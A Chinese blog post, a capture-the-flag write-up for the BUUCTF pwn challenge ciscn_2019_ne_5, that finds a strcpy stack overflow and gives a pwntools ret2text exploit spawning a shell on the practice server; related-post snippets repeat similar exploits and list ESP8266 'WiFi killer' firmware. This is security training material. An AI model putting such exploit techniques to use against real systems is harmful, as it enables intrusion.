BUUCTF-Pwn-ciscn_2019_ne_5

最新推荐文章于 2023-04-09 16:35:13 发布
最新推荐文章于 2023-04-09 16:35:13 发布
阅读量126 收藏
点赞数
分类专栏: CTF Pwn 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46035101/article/details/123390471
版权
CTF 同时被 2 个专栏收录
29 篇文章 0 订阅
订阅专栏
Pwn
21 篇文章 0 订阅
订阅专栏

题目截图
在这里插入图片描述
例行检查
在这里插入图片描述
32位的程序,开启了NX,用IDA打开,查看函数导入表,存在system函数
在这里插入图片描述
查看字符串,存在字符串sh,并且在fflash的结尾处
在这里插入图片描述
按u展开,得到字符串sh的起始地址为0x80482EA
在这里插入图片描述
在主函数中找到变量src,可以找到它到ebp的大小为0xfc
在这里插入图片描述
继续向下
在这里插入图片描述
继续向下找到两个可以溢出的函数
在这里插入图片描述

在函数AddLog中存在溢出,但是这个溢出点无法使用,因为它覆盖的是main函数的返回地址,但是main函数只有在输入0时才会结束,如果输入0就会执行exit函数导致程序直接结束
在这里插入图片描述
来看看GetFlag函数,变量dest到ebp的大小为0x48,而变量src中我们最多可以输入0x128个字节的数据,所以存在溢出,而且只需要保证GetFlag函数能结束就能到达我们覆盖的地址
在这里插入图片描述

exp

from pwn import*

elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5')
p=remote('node4.buuoj.cn',28555) 
str_sh=0x80482EA
system_plt=elf.plt['system']
p.sendline(b'administrator')
p.sendline(b'1')
payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh)
p.sendline(payload)
p.sendline(b'4')
p.interactive()
餐桌上的猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 198
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1616
buuctf ciscn_2019_ne_5题目分析
[BUUCTF-pwn]——ciscn_2019_ne_5
Y_peak的博客
02-11 377
[BUUCTF-pwn]——ciscn_2019_ne_5 题目地址:https://buuoj.cn/challenges#ciscn_2019_ne_5 checksec下 在IDA中,竟然不给我反汇编,第一次碰到. 查了下解决方法,在反汇编失败的地方,单独反汇编就好. int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // [esp+0h] [ebp-100h] char src[4]
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 1950
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
ciscn_2019_ne_5【BUUCTF】
qq_41696518的博客
08-31 529
ciscn_2019_ne_5 BUUCTF
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
BUUCTF pwn——ciscn_2019_ne_5
CNS-Enterprise BCC-1701-J
04-09 133
BUUCTF 做题练习
buuctf|pwn-ciscn_2019_ne_5-wp
l2645470582_的博客
11-09 196
1.例行检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串 我们看到flag就是我们输入的log 3.我们看看main函数里面有什么 我们看到第一个条件s1 == 'administrator' 进入过后,v3是你想要选择执行的内容 ADDLog():我们看到这里是输入log,跟我们的flag有关系 a1是我们外面传进来的src = 48,读取128个就造成了溢出 ...
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1085
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 785
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
BUUCTF 刷题 ciscn_2019_ne_5
Helloity的博客
02-10 2297
先附上题目地址:BUUCTF在线评测 首当其冲checksec,开启了NX保护,32位程序。 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 还是蛮有意思的一道题,我的IDA有些问题,无法f5主函数,那么就看汇编。我先运行了一下题目,发现要我们输入一个密码,但
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 687
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
ciscn_2019_ne_5
、moddemod
06-17 382
这道题如果出现不能反编译参考文章 简单说一下思路,在AddLog中添加的数据存放在src对应的栈中,在GetFlag中因为strcpy函数存在溢出,所以直接在AddLog构造payload在strcpy中溢出就直接拿到shell了! exp #!/usr/bin/env python # coding=utf-8 from pwn import * context(log_level='debug') proc_name = './ciscn_2019_ne_5' p = process(proc_
【BUUCTF】ciscn_2019_ne_5 Write Up
古月浪子的博客
08-06 841
题目是一道32位程序,依旧是rop 仔细观察可以发现漏洞出在GetFlag函数的strcpy上,我们可以输入的字符有128个,而复制字符串的栈空间只有0x48字节 程序本身存在fflush函数,我们可以直接用它的sh来当作system的参数 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='i386' context.log_level='deb...
buuctf ciscn_2019_n_5 (ret2shellcode)
carol2358的博客
04-21 1001
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值